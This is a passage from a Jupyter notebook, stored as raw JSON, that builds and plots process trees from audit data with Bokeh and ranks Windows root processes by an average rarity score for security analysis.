SCX_UnixProce\",\"sudo\\u0000/opt/microsoft/omsagent/ruby/bin/ruby\\u0000/opt/microsoft/omsagent/plugin/tailfilereader.rb\\u0000/var/log/audit/audit.log\\u0000-p\\u0000/var/opt\",\"/opt/microsoft/omsagent/ruby/bin/ruby\\u0000/opt/microsoft/omsagent/plugin/tailfilereader.rb\\u0000/var/log/audit/audit.log\\u0000-p\\u0000/var/opt/micr\",\"sudo\\u0000test\\u0000-f\\u0000/var/log/audit/audit.log\",\"test\\u0000-f\\u0000/var/log/audit/audit.log\",\"sudo\\u0000/opt/microsoft/omsagent/ruby/bin/ruby\\u0000/opt/microsoft/omsagent/plugin/tailfilereader.rb\\u0000/var/log/audit/audit.log\\u0000-p\\u0000/var/opt\",\"/opt/microsoft/omsagent/ruby/bin/ruby\\u0000/opt/microsoft/omsagent/plugin/tailfilereader.rb\\u0000/var/log/audit/audit.log\\u0000-p\\u0000/var/opt/micr\",\"sudo\\u0000test\\u0000-f\\u0000/var/log/audit/audit.log\",\"test\\u0000-f\\u0000/var/log/audit/audit.log\",\"sudo\\u0000/opt/microsoft/omsagent/ruby/bin/ruby\\u0000/opt/microsoft/omsagent/plugin/tailfilereader.rb\\u0000/var/log/audit/audit.log\\u0000-p\\u0000/var/opt\",\"/opt/microsoft/omsagent/ruby/bin/ruby\\u0000/opt/microsoft/omsagent/plugin/tailfilereader.rb\\u0000/var/log/audit/audit.log\\u0000-p\\u0000/var/opt/micr\",\"sudo\\u0000test\\u0000-f\\u0000/var/log/audit/audit.log\",\"test\\u0000-f\\u0000/var/log/audit/audit.log\",\"sudo\\u0000/opt/microsoft/omsagent/ruby/bin/ruby\\u0000/opt/microsoft/omsagent/plugin/tailfilereader.rb\\u0000/var/log/audit/audit.log\\u0000-p\\u0000/var/opt\",\"/opt/microsoft/omsagent/ruby/bin/ruby\\u0000/opt/microsoft/omsagent/plugin/tailfilereader.rb\\u0000/var/log/audit/audit.log\\u0000-p\\u0000/var/opt/micr\",\"sudo\\u0000test\\u0000-f\\u0000/var/log/audit/audit.log\",\"test\\u0000-f\\u0000/var/log/audit/audit.log\",\"sudo\\u0000/opt/microsoft/omsagent/ruby/bin/ruby\\u0000/opt/microsoft/omsagent/plugin/tailfilereader.rb\\u0000/var/log/audit/audit.log\\u0000-p\\u0000/var/opt\",\"/opt/microsoft/omsagent/ruby/bin/ruby\\u0000/opt/microsoft/omsagent/plugin/tailfilereader.rb\\u0000/var/log/audit/audit.log\\u0000-p\\u0000/var/opt/micr\",\"sudo\\u0000test\\u0000-f\\u0000/var/log/audit/audit.log\",\"test\\u0000-f\\u0000/var/log/audit/audit.log\",\"sudo\\u0000/opt/microsoft/omsagent/ruby/bin/ruby\\u0000/opt/microsoft/omsagent/plugin/tailfilereader.rb\\u0000/var/log/audit/audit.log\\u0000-p\\u0000/var/opt\",\"/opt/microsoft/omsagent/ruby/bin/ruby\\u0000/opt/microsoft/omsagent/plugin/tailfilereader.rb\\u0000/var/log/audit/audit.log\\u0000-p\\u0000/var/opt/micr\",\"sudo\\u0000test\\u0000-f\\u0000/var/log/audit/audit.log\",\"test\\u0000-f\\u0000/var/log/audit/audit.log\",\"sudo\\u0000/opt/microsoft/omsagent/ruby/bin/ruby\\u0000/opt/microsoft/omsagent/plugin/tailfilereader.rb\\u0000/var/log/audit/audit.log\\u0000-p\\u0000/var/opt\",\"/opt/microsoft/omsagent/ruby/bin/ruby\\u0000/opt/microsoft/omsagent/plugin/tailfilereader.rb\\u0000/var/log/audit/audit.log\\u0000-p\\u0000/var/opt/micr\",\"sudo\\u0000test\\u0000-f\\u0000/var/log/audit/audit.log\",\"test\\u0000-f\\u0000/var/log/audit/audit.log\",\"sudo\\u0000/opt/microsoft/omsagent/ruby/bin/ruby\\u0000/opt/microsoft/omsagent/plugin/tailfilereader.rb\\u0000/var/log/audit/audit.log\\u0000-p\\u0000/var/opt\",\"/opt/microsoft/omsagent/ruby/bin/ruby\\u0000/opt/microsoft/omsagent/plugin/tailfilereader.rb\\u0000/var/log/audit/audit.log\\u0000-p\\u0000/var/opt/micr\",\"sudo\\u0000test\\u0000-f\\u0000/var/log/audit/audit.log\",\"test\\u0000-f\\u0000/var/log/audit/audit.log\",\"sudo\\u0000/opt/microsoft/omsagent/ruby/bin/ruby\\u0000/opt/microsoft/omsagent/plugin/tailfilereader.rb\\u0000/var/log/audit/audit.log\\u0000-p\\u0000/var/opt\",\"/opt/microsoft/omsagent/ruby/bin/ruby\\u0000/opt/microsoft/omsagent/plugin/tailfilereader.rb\\u0000/var/log/audit/audit.log\\u0000-p\\u0000/var/opt/micr\",\"sudo\\u0000test\\u0000-f\\u0000/var/log/audit/audit.log\",\"test\\u0000-f\\u0000/var/log/audit/audit.log\",\"sudo\\u0000/opt/microsoft/omsagent/ruby/bin/ruby\\u0000/opt/microsoft/omsagent/plugin/tailfilereader.rb\\u0000/var/log/audit/audit.log\\u0000-p\\u0000/var/opt\",\"/opt/microsoft/omsagent/ruby/bin/ruby\\u0000/opt/microsoft/omsagent/plugin/tailfilereader.rb\\u0000/var/log/audit/audit.log\\u0000-p\\u0000/var/opt/micr\",\"sudo\\u0000test\\u0000-f\\u0000/var/log/audit/audit.log\",\"test\\u0000-f\\u0000/var/log/audit/audit.log\",\"sudo\\u0000/opt/microsoft/omsagent/ruby/bin/ruby\\u0000/opt/microsoft/omsagent/plugin/tailfilereader.rb\\u0000/var/log/audit/audit.log\\u0000-p\\u0000/var/opt\",\"/opt/microsoft/omsagent/ruby/bin/ruby\\u0000/opt/microsoft/omsagent/plugin/tailfilereader.rb\\u0000/var/log/audit/audit.log\\u0000-p\\u0000/var/opt/micr\",\"sudo\\u0000test\\u0000-f\\u0000/var/log/audit/audit.log\",\"test\\u0000-f\\u0000/var/log/audit/audit.log\",\"sudo\\u0000/opt/microsoft/omsagent/ruby/bin/ruby\\u0000/opt/microsoft/omsagent/plugin/tailfilereader.rb\\u0000/var/log/audit/audit.log\\u0000-p\\u0000/var/opt\",\"/opt/microsoft/omsagent/ruby/bin/ruby\\u0000/opt/microsoft/omsagent/plugin/tailfilereader.rb\\u0000/var/log/audit/audit.log\\u0000-p\\u0000/var/opt/micr\",\"sudo\\u0000test\\u0000-f\\u0000/var/log/audit/audit.log\",\"test\\u0000-f\\u0000/var/log/audit/audit.log\",\"sudo\\u0000/opt/microsoft/omsagent/ruby/bin/ruby\\u0000/opt/microsoft/omsagent/plugin/tailfilereader.rb\\u0000/var/log/audit/audit.log\\u0000-p\\u0000/var/opt\",\"/opt/microsoft/omsagent/ruby/bin/ruby\\u0000/opt/microsoft/omsagent/plugin/tailfilereader.rb\\u0000/var/log/audit/audit.log\\u0000-p\\u0000/var/opt/micr\",\"sudo\\u0000test\\u0000-f\\u0000/var/log/audit/audit.log\",\"test\\u0000-f\\u0000/var/log/audit/audit.log\"],\"ses\":[\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\",\"-1\"],\"source_index\":[\"1002\",\"159\",\"160\",\"161\",\"162\",\"210\",\"215\",\"217\",\"216\",\"218\",\"219\",\"220\",\"225\",\"226\",\"227\",\"228\",\"284\",\"285\",\"286\",\"287\",\"411\",\"412\",\"413\",\"414\",\"470\",\"471\",\"472\",\"473\",\"55\",\"56\",\"57\",\"58\",\"569\",\"570\",\"571\",\"572\",\"630\",\"631\",\"632\",\"633\",\"689\",\"690\",\"691\",\"692\",\"752\",\"753\",\"754\",\"755\",\"811\",\"812\",\"813\",\"814\",\"874\",\"875\",\"876\",\"877\",\"933\",\"934\",\"935\",\"936\",\"996\",\"997\",\"998\",\"999\"],\"source_index_par\":{\"__ndarray__\":\"AAAAAAAA+H8AAAAAAAD4fwAAAAAAzJFAAAAAAADckUAAAAAAAOCRQAAAAAAAAPh/AAAAAAAA+H8AAAAAAAD4fwAAAAAA6I1AAAAAAAAA+H8AAAAAAPiNQAAAAAAA+I1AAAAAAAAA+H8AAAAAADCOQAAAAAAAUI5AAAAAAABYjkAAAAAAAAD4fwAAAAAABJFAAAAAAAAUkUAAAAAAABiRQAAAAAAAAPh/AAAAAACkkEAAAAAAALSQQAAAAAAAuJBAAAAAAAAA+H8AAAAAAOiHQAAAAAAACIhAAAAAAAAQiEAAAAAAAAD4fwAAAAAAYItAAAAAAACAi0AAAAAAAIiLQAAAAAAAAPh/AAAAAACQiUAAAAAAALCJQAAAAAAAuIlAAAAAAAAA+H8AAAAAABiPQAAAAAAAOI9AAAAAAABAj0AAAAAAAAD4fwAAAAAAoGxAAAAAAAAgbUAAAAAAAEBtQAAAAAAAAPh/AAAAAABgekAAAAAAAKB6QAAAAAAAsHpAAAAAAAAA+H8AAAAAADiAQAAAAAAAWIBAAAAAAABggEAAAAAAAAD4fwAAAAAAYIVAAAAAAACAhUAAAAAAAIiFQAAAAAAAAPh/AAAAAACAT0AAAAAAAMBQQAAAAAAAAFFAAAAAAAAA+H8AAAAAAEBjQAAAAAAAwGNAAAAAAADgY0A=\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[64]},\"success\":[\"NaN\",\"yes\",\"yes\",\"yes\",\"yes\",\"yes\",\"yes\",\"yes\",\"yes\",\"yes\",\"yes\",\"yes\",\"yes\",\"yes\",\"yes\",\"yes\",\"yes\",\"yes\",\"yes\",\"yes\",\"yes\",\"yes\",\"yes\",\"yes\",\"yes\",\"yes\",\"yes\",\"yes\",\"yes\",\"yes\",\"yes\",\"yes\",\"yes\",\"yes\",\"yes\",\"yes\",\"yes\",\"yes\",\"yes\",\"yes\",\"yes\",\"yes\",\"yes\",\"yes\",\"yes\",\"yes\",\"yes\",\"yes\",\"yes\",\"yes\",\"yes\",\"yes\",\"yes\",\"yes\",\"yes\",\"yes\",\"yes\",\"yes\",\"yes\",\"yes\",\"yes\",\"yes\",\"yes\",\"yes\"],\"uid\":[\"NaN\",\"998\",\"0\",\"0\",\"0\",\"998\",\"998\",\"998\",\"998\",\"998\",\"998\",\"998\",\"998\",\"0\",\"0\",\"0\",\"998\",\"0\",\"0\",\"0\",\"998\",\"0\",\"0\",\"0\",\"998\",\"0\",\"0\",\"0\",\"998\",\"0\",\"0\",\"0\",\"998\",\"0\",\"0\",\"0\",\"998\",\"0\",\"0\",\"0\",\"998\",\"0\",\"0\",\"0\",\"998\",\"0\",\"0\",\"0\",\"998\",\"0\",\"0\",\"0\",\"998\",\"0\",\"0\",\"0\",\"998\",\"0\",\"0\",\"0\",\"998\",\"0\",\"0\",\"0\"]},\"selected\":{\"id\":\"1390\"},\"selection_policy\":{\"id\":\"1391\"}},\"id\":\"1347\",\"type\":\"ColumnDataSource\"},{\"attributes\":{\"active_drag\":\"auto\",\"active_inspect\":\"auto\",\"active_multi\":{\"id\":\"1456\"},\"active_scroll\":\"auto\",\"active_tap\":\"auto\",\"tools\":[{\"id\":\"1436\"},{\"id\":\"1437\"},{\"id\":\"1438\"},{\"id\":\"1439\"},{\"id\":\"1440\"},{\"id\":\"1441\"},{\"id\":\"1456\"}]},\"id\":\"1443\",\"type\":\"Toolbar\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.1},\"fill_color\":{\"field\":\"cwd\",\"transform\":{\"id\":\"1348\"}},\"height\":{\"units\":\"data\",\"value\":0.8},\"line_alpha\":{\"value\":0.1},\"line_color\":{\"value\":\"#1f77b4\"},\"width\":{\"units\":\"data\",\"value\":1.2},\"x\":{\"field\":\"Level\",\"transform\":{\"id\":\"1450\"}},\"y\":{\"field\":\"Row\"}},\"id\":\"1453\",\"type\":\"Rect\"},{\"attributes\":{},\"id\":\"1420\",\"type\":\"DataRange1d\"},{\"attributes\":{\"source\":{\"id\":\"1347\"}},\"id\":\"1414\",\"type\":\"CDSView\"},{\"attributes\":{\"range\":{\"id\":\"1352\"},\"value\":0.1},\"id\":\"1394\",\"type\":\"Dodge\"},{\"attributes\":{\"text\":{\"field\":\"PID\"},\"text_alpha\":{\"value\":0.1},\"text_baseline\":\"middle\",\"text_color\":{\"value\":\"black\"},\"text_font_size\":{\"value\":\"8pt\"},\"x\":{\"field\":\"Level\",\"transform\":{\"id\":\"1408\"}},\"y\":{\"field\":\"Row\",\"transform\":{\"id\":\"1409\"}}},\"id\":\"1412\",\"type\":\"Text\"},{\"attributes\":{\"range\":{\"id\":\"1354\"},\"value\":-0.2},\"id\":\"1395\",\"type\":\"Dodge\"},{\"attributes\":{\"data_source\":{\"id\":\"1347\"},\"glyph\":{\"id\":\"1411\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"1412\"},\"selection_glyph\":null,\"view\":{\"id\":\"1414\"}},\"id\":\"1413\",\"type\":\"GlyphRenderer\"},{\"attributes\":{\"text\":{\"field\":\"PID\"},\"text_baseline\":\"middle\",\"text_color\":{\"value\":\"black\"},\"text_font_size\":{\"value\":\"8pt\"},\"x\":{\"field\":\"Level\",\"transform\":{\"id\":\"1408\"}},\"y\":{\"field\":\"Row\",\"transform\":{\"id\":\"1409\"}}},\"id\":\"1411\",\"type\":\"Text\"},{\"attributes\":{\"active_drag\":\"auto\",\"active_inspect\":\"auto\",\"active_multi\":null,\"active_scroll\":\"auto\",\"active_tap\":\"auto\",\"tools\":[{\"id\":\"1368\"},{\"id\":\"1369\"},{\"id\":\"1370\"},{\"id\":\"1371\"},{\"id\":\"1377\"}]},\"id\":\"1372\",\"type\":\"Toolbar\"},{\"attributes\":{\"dimensions\":\"height\"},\"id\":\"1368\",\"type\":\"PanTool\"},{\"attributes\":{\"range\":null,\"value\":-0.5},\"id\":\"1450\",\"type\":\"Dodge\"},{\"attributes\":{},\"id\":\"1365\",\"type\":\"BasicTicker\"},{\"attributes\":{\"data_source\":{\"id\":\"1347\"},\"glyph\":{\"id\":\"1397\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"1398\"},\"selection_glyph\":null,\"view\":{\"id\":\"1400\"}},\"id\":\"1399\",\"type\":\"GlyphRenderer\"},{\"attributes\":{},\"id\":\"1424\",\"type\":\"LinearScale\"},{\"attributes\":{\"bottom_units\":\"screen\",\"fill_alpha\":0.5,\"fill_color\":\"lightgrey\",\"left_units\":\"screen\",\"level\":\"overlay\",\"line_alpha\":1.0,\"line_color\":\"black\",\"line_dash\":[4,4],\"line_width\":2,\"right_units\":\"screen\",\"top_units\":\"screen\"},\"id\":\"1442\",\"type\":\"BoxAnnotation\"},{\"attributes\":{\"text\":{\"field\":\"cmd\"},\"text_alpha\":{\"value\":0.1},\"text_baseline\":\"middle\",\"text_color\":{\"value\":\"black\"},\"text_font_size\":{\"value\":\"7pt\"},\"x\":{\"field\":\"Level\",\"transform\":{\"id\":\"1394\"}},\"y\":{\"field\":\"Row\",\"transform\":{\"id\":\"1395\"}}},\"id\":\"1398\",\"type\":\"Text\"},{\"attributes\":{},\"id\":\"1429\",\"type\":\"BasicTicker\"},{\"attributes\":{},\"id\":\"1370\",\"type\":\"SaveTool\"},{\"attributes\":{\"axis\":{\"id\":\"1360\"},\"grid_line_alpha\":0.1,\"grid_line_color\":\"navy\",\"minor_grid_line_alpha\":0.1,\"minor_grid_line_color\":\"navy\",\"ticker\":{\"id\":\"1417\"}},\"id\":\"1363\",\"type\":\"Grid\"},{\"attributes\":{\"text\":{\"field\":\"cmd\"},\"text_baseline\":\"middle\",\"text_color\":{\"value\":\"black\"},\"text_font_size\":{\"value\":\"7pt\"},\"x\":{\"field\":\"Level\",\"transform\":{\"id\":\"1394\"}},\"y\":{\"field\":\"Row\",\"transform\":{\"id\":\"1395\"}}},\"id\":\"1397\",\"type\":\"Text\"},{\"attributes\":{\"axis\":{\"id\":\"1428\"},\"grid_line_color\":null,\"ticker\":null},\"id\":\"1431\",\"type\":\"Grid\"}],\"root_ids\":[\"1461\"]},\"title\":\"Bokeh Application\",\"version\":\"2.1.1\"}};\n", " var render_items = [{\"docid\":\"c62c8479-2d7c-4a96-985d-15f02ffa9f16\",\"root_ids\":[\"1461\"],\"roots\":{\"1461\":\"e8b73f90-6ff9-4fca-bb2d-fc7ba8c60cb1\"}}];\n", " root.Bokeh.embed.embed_items_notebook(docs_json, render_items);\n", "\n", " }\n", " if (root.Bokeh !== undefined) {\n", " embed_document(root);\n", " } else {\n", " var attempts = 0;\n", " var timer = setInterval(function(root) {\n", " if (root.Bokeh !== undefined) {\n", " clearInterval(timer);\n", " embed_document(root);\n", " } else {\n", " attempts++;\n", " if (attempts > 100) {\n", " clearInterval(timer);\n", " console.log(\"Bokeh: ERROR: Unable to run BokehJS code because BokehJS library is missing\");\n", " }\n", " }\n", " }, 10, root)\n", " }\n", "})(window);" ], "application/vnd.bokehjs_exec.v0+json": "" }, "metadata": { "application/vnd.bokehjs_exec.v0+json": { "id": "1461" } }, "output_type": "display_data" }, { "data": { "text/plain": [ "(Figure(id='1349', ...), Row(id='1461', ...))" ] }, "execution_count": 6, "metadata": {}, "output_type": "execute_result" } ], "source": [ "nbdisplay.plot_process_tree(data=full_tree[:1000], legend_col=\"cwd\")" ] }, { "cell_type": "markdown", "metadata": {}, "source": [ "## Plotting Using a color gradient" ] }, { "cell_type": "code", "execution_count": 7, "metadata": { "ExecuteTime": { "end_time": "2020-08-25T15:53:41.192996Z", "start_time": "2020-08-25T15:53:30.369997Z" }, "execution_event_id": "2bb8c149-9ab9-4a74-8e3f-d9418c3c794f", "last_executed_text": "p_tree_leg = ptree.build_process_tree(proc_tree, show_progress=True)", "persistent_id": "1918edbe-6e6a-4d00-9c31-de7fed6f588b", "scrolled": true }, "outputs": [ { "data": { "application/vnd.jupyter.widget-view+json": { "model_id": "3d0d333478924baea91a4cedace3916f", "version_major": 2, "version_minor": 0 }, "text/plain": [ "HBox(children=(IntProgress(value=0, bar_style='info', description='Progress:'), Label(value='0%')))" ] }, "metadata": {}, "output_type": "display_data" }, { "name": "stdout", "output_type": "stream", "text": [ "{'Processes': 22992, 'RootProcesses': 31, 'LeafProcesses': 15587, 'BranchProcesses': 7374, 'IsolatedProcesses': 0, 'LargestTreeDepth': 839}\n" ] } ], "source": [ "proc_rarity = pd.read_pickle(\"./data/procs_with_cluster.pkl\")\n", "proc_rarity_tree = ptree.build_process_tree(proc_rarity, show_progress=True)" ] }, { "cell_type": "code", "execution_count": 8, "metadata": { "ExecuteTime": { "end_time": "2020-08-25T15:53:46.774998Z", "start_time": "2020-08-25T15:53:41.194998Z" }, "execution_event_id": "0a375198-c37a-4e9b-a288-b6bfd8fec5d3", "last_executed_text": "proc_rarity.head()", "persistent_id": "e27a3066-b20e-483c-b9c2-52c154f1a03c", "scrolled": true }, "outputs": [ { "data": { "text/html": [ "
\n", "\n", "\n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", "
RowRootProcessTreeSize:AverageRarity
2727C:\\Windows\\System32\\svchost.exe40.666726
2323C:\\Windows\\System32\\svchost.exe20.500000
2222C:\\Windows\\System32\\smss.exe300.398288
2020C:\\Windows\\SoftwareDistribution\\Download\\Insta...20.333333
99C:\\Windows\\System32\\smss.exe70.250000
77C:\\ProgramData\\Microsoft\\Windows Defender\\plat...460.190123
1010C:\\Windows\\System32\\winlogon.exe20.166667
55C:\\Windows\\System32\\svchost.exe210.146667
1818C:\\WindowsAzure\\GuestAgent_2.7.41491.901_2019-...30.125089
1313C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.3031...20.125000
2929C:\\Program Files\\Microsoft Monitoring Agent\\Ag...40.095297
2525C:\\Program Files\\Microsoft Monitoring Agent\\Ag...40.095297
2121C:\\ProgramData\\Microsoft\\Windows Defender\\plat...210.059754
1616C:\\Windows\\System32\\services.exe3200.056118
1515C:\\Windows\\System32\\svchost.exe13810.038497
22C:\\Windows\\System32\\svchost.exe21920.025462
44C:\\Windows\\System32\\services.exe1050.025112
33C:\\Windows\\System32\\svchost.exe6890.019825
00C:\\Program Files\\Microsoft Monitoring Agent\\Ag...130.012703
1111unknown89360.011424
11C:\\WindowsAzure\\GuestAgent_2.7.41491.901_2019-...2590.007365
1919C:\\Windows\\System32\\svchost.exe49490.007174
1717C:\\WindowsAzure\\GuestAgent_2.7.41491.901_2019-...110.007138
1414C:\\Program Files\\Microsoft Monitoring Agent\\Ag...2740.003676
88C:\\Program Files\\Microsoft Monitoring Agent\\Ag...37030.000194
1212C:\\Program Files\\Microsoft Monitoring Agent\\Ag...20.000178
2424C:\\Program Files\\Microsoft Monitoring Agent\\Ag...20.000178
2626C:\\Program Files\\Microsoft Monitoring Agent\\Ag...20.000178
2828C:\\Program Files\\Microsoft Monitoring Agent\\Ag...20.000178
66C:\\Program Files\\Microsoft Monitoring Agent\\Ag...20.000178
3030C:\\Program Files\\Microsoft Monitoring Agent\\Ag...20.000178
\n", "
" ], "text/plain": [ " Row RootProcess TreeSize: \\\n", "27 27 C:\\Windows\\System32\\svchost.exe 4 \n", "23 23 C:\\Windows\\System32\\svchost.exe 2 \n", "22 22 C:\\Windows\\System32\\smss.exe 30 \n", "20 20 C:\\Windows\\SoftwareDistribution\\Download\\Insta... 2 \n", "9 9 C:\\Windows\\System32\\smss.exe 7 \n", "7 7 C:\\ProgramData\\Microsoft\\Windows Defender\\plat... 46 \n", "10 10 C:\\Windows\\System32\\winlogon.exe 2 \n", "5 5 C:\\Windows\\System32\\svchost.exe 21 \n", "18 18 C:\\WindowsAzure\\GuestAgent_2.7.41491.901_2019-... 3 \n", "13 13 C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.3031... 2 \n", "29 29 C:\\Program Files\\Microsoft Monitoring Agent\\Ag... 4 \n", "25 25 C:\\Program Files\\Microsoft Monitoring Agent\\Ag... 4 \n", "21 21 C:\\ProgramData\\Microsoft\\Windows Defender\\plat... 21 \n", "16 16 C:\\Windows\\System32\\services.exe 320 \n", "15 15 C:\\Windows\\System32\\svchost.exe 1381 \n", "2 2 C:\\Windows\\System32\\svchost.exe 2192 \n", "4 4 C:\\Windows\\System32\\services.exe 105 \n", "3 3 C:\\Windows\\System32\\svchost.exe 689 \n", "0 0 C:\\Program Files\\Microsoft Monitoring Agent\\Ag... 13 \n", "11 11 unknown 8936 \n", "1 1 C:\\WindowsAzure\\GuestAgent_2.7.41491.901_2019-... 259 \n", "19 19 C:\\Windows\\System32\\svchost.exe 4949 \n", "17 17 C:\\WindowsAzure\\GuestAgent_2.7.41491.901_2019-... 11 \n", "14 14 C:\\Program Files\\Microsoft Monitoring Agent\\Ag... 274 \n", "8 8 C:\\Program Files\\Microsoft Monitoring Agent\\Ag... 3703 \n", "12 12 C:\\Program Files\\Microsoft Monitoring Agent\\Ag... 2 \n", "24 24 C:\\Program Files\\Microsoft Monitoring Agent\\Ag... 2 \n", "26 26 C:\\Program Files\\Microsoft Monitoring Agent\\Ag... 2 \n", "28 28 C:\\Program Files\\Microsoft Monitoring Agent\\Ag... 2 \n", "6 6 C:\\Program Files\\Microsoft Monitoring Agent\\Ag... 2 \n", "30 30 C:\\Program Files\\Microsoft Monitoring Agent\\Ag... 2 \n", "\n", " AverageRarity \n", "27 0.666726 \n", "23 0.500000 \n", "22 0.398288 \n", "20 0.333333 \n", "9 0.250000 \n", "7 0.190123 \n", "10 0.166667 \n", "5 0.146667 \n", "18 0.125089 \n", "13 0.125000 \n", "29 0.095297 \n", "25 0.095297 \n", "21 0.059754 \n", "16 0.056118 \n", "15 0.038497 \n", "2 0.025462 \n", "4 0.025112 \n", "3 0.019825 \n", "0 0.012703 \n", "11 0.011424 \n", "1 0.007365 \n", "19 0.007174 \n", "17 0.007138 \n", "14 0.003676 \n", "8 0.000194 \n", "12 0.000178 \n", "24 0.000178 \n", "26 0.000178 \n", "28 0.000178 \n", "6 0.000178 \n", "30 0.000178 " ] }, "execution_count": 8, "metadata": {}, "output_type": "execute_result" } ], "source": [ "prar_roots = ptree.get_roots(proc_rarity_tree)\n", "\n", "# Find the tree with the highest Rarity Score\n", "tree_rarity = []\n", "for row_num, (ix, row) in enumerate(prar_roots.iterrows()):\n", " rarity_tree = ptree.get_descendents(proc_rarity_tree, row)\n", " tree_rarity.append({\n", " \"Row\": row_num,\n", " \"RootProcess\": prar_roots.loc[ix].NewProcessName,\n", " \"TreeSize:\": len(rarity_tree),\n", " \"AverageRarity\": rarity_tree[\"Rarity\"].mean()\n", " })\n", " \n", "pd.DataFrame(tree_rarity).sort_values(\"AverageRarity\", ascending=False)" ] }, { "cell_type": "code", "execution_count": 9, "metadata": { "ExecuteTime": { "end_time": "2020-08-25T15:53:46.965995Z", "start_time": "2020-08-25T15:53:46.778997Z" } }, "outputs": [ { "data": { "text/html": [ "\n", "
\n", " \n", " Loading BokehJS ...\n", "
" ] }, "metadata": {}, "output_type": "display_data" }, { "data": { "application/javascript": [ "\n", "(function(root) {\n", " function now() {\n", " return new Date();\n", " }\n", "\n", " var force = true;\n", "\n", " if (typeof root._bokeh_onload_callbacks === \"undefined\" || force === true) {\n", " root._bokeh_onload_callbacks = [];\n", " root._bokeh_is_loading = undefined;\n", " }\n", "\n", " var JS_MIME_TYPE = 'application/javascript';\n", " var HTML_MIME_TYPE = 'text/html';\n", " var EXEC_MIME_TYPE = 'application/vnd.bokehjs_exec.v0+json';\n", " var CLASS_NAME = 'output_bokeh rendered_html';\n", "\n", " /**\n", " * Render data to the DOM node\n", " */\n", " function render(props, node) {\n", " var script = document.createElement(\"script\");\n", " node.appendChild(script);\n", " }\n", "\n", " /**\n", " * Handle when an output is cleared or removed\n", " */\n", " function handleClearOutput(event, handle) {\n", " var cell = handle.cell;\n", "\n", " var id = cell.output_area._bokeh_element_id;\n", " var server_id = cell.output_area._bokeh_server_id;\n", " // Clean up Bokeh references\n", " if (id != null && id in Bokeh.index) {\n", " Bokeh.index[id].model.document.clear();\n", " delete Bokeh.index[id];\n", " }\n", "\n", " if (server_id !== undefined) {\n", " // Clean up Bokeh references\n", " var cmd = \"from bokeh.io.state import curstate; print(curstate().uuid_to_server['\" + server_id + \"'].get_sessions()[0].document.roots[0]._id)\";\n", " cell.notebook.kernel.execute(cmd, {\n", " iopub: {\n", " output: function(msg) {\n", " var id = msg.content.text.trim();\n", " if (id in Bokeh.index) {\n", " Bokeh.index[id].model.document.clear();\n", " delete Bokeh.index[id];\n", " }\n", " }\n", " }\n", " });\n", " // Destroy server and session\n", " var cmd = \"import bokeh.io.notebook as ion; ion.destroy_server('\" + server_id + \"')\";\n", " cell.notebook.kernel.execute(cmd);\n", " }\n", " }\n", "\n", " /**\n", " * Handle when a new output is added\n", " */\n", " function handleAddOutput(event, handle) {\n", " var output_area = handle.output_area;\n", " var output = handle.output;\n", "\n", " // limit handleAddOutput to display_data with EXEC_MIME_TYPE content only\n", " if ((output.output_type != \"display_data\") || (!output.data.hasOwnProperty(EXEC_MIME_TYPE))) {\n", " return\n", " }\n", "\n", " var toinsert = output_area.element.find(\".\" + CLASS_NAME.split(' ')[0]);\n", "\n", " if (output.metadata[EXEC_MIME_TYPE][\"id\"] !== undefined) {\n", " toinsert[toinsert.length - 1].firstChild.textContent = output.data[JS_MIME_TYPE];\n", " // store reference to embed id on output_area\n", " output_area._bokeh_element_id = output.metadata[EXEC_MIME_TYPE][\"id\"];\n", " }\n", " if (output.metadata[EXEC_MIME_TYPE][\"server_id\"] !== undefined) {\n", " var bk_div = document.createElement(\"div\");\n", " bk_div.innerHTML = output.data[HTML_MIME_TYPE];\n", " var script_attrs = 